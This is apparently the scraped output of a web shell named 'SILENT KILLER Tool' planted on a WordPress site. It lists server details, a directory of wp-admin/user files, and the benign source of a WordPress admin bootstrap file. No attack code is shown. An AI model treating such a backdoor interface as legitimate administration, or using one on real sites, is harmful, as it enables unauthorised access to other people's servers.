Current Path: > home > transcarter > public_html > wp-admin > user >
Operation : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64 Software : Apache Server IP : 198.54.126.42 | Your IP: 216.73.216.135 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
about.php | File | 257 bytes | February 06 2020 06:33:12. | |
admin.php | File | 865 bytes | February 06 2020 06:33:12. | |
contribute.php | File | 267 bytes | May 08 2024 16:04:14. | |
credits.php | File | 261 bytes | February 06 2020 06:33:12. | |
error_log | File | 6336 bytes | July 08 2025 06:04:41. | |
freedoms.php | File | 263 bytes | February 06 2020 06:33:12. | |
index.php | File | 251 bytes | February 06 2020 06:33:12. | |
menu.php | File | 758 bytes | February 06 2020 06:33:12. | |
privacy.php | File | 261 bytes | February 06 2020 06:33:12. | |
profile.php | File | 252 bytes | February 06 2020 06:33:12. | |
user-edit.php | File | 250 bytes | February 06 2020 06:33:12. |
<?php /** * WordPress User Administration Bootstrap * * @package WordPress * @subpackage Administration * @since 3.1.0 */ define( 'WP_USER_ADMIN', true ); require_once dirname( __DIR__ ) . '/admin.php'; if ( ! is_multisite() ) { wp_redirect( admin_url() ); exit; } $redirect_user_admin_request = ( 0 !== strcasecmp( $current_blog->domain, $current_site->domain ) || 0 !== strcasecmp( $current_blog->path, $current_site->path ) ); /** * Filters whether to redirect the request to the User Admin in Multisite. * * @since 3.2.0 * * @param bool $redirect_user_admin_request Whether the request should be redirected. */ $redirect_user_admin_request = apply_filters( 'redirect_user_admin_request', $redirect_user_admin_request ); if ( $redirect_user_admin_request ) { wp_redirect( user_admin_url() ); exit; } unset( $redirect_user_admin_request );
SILENT KILLER Tool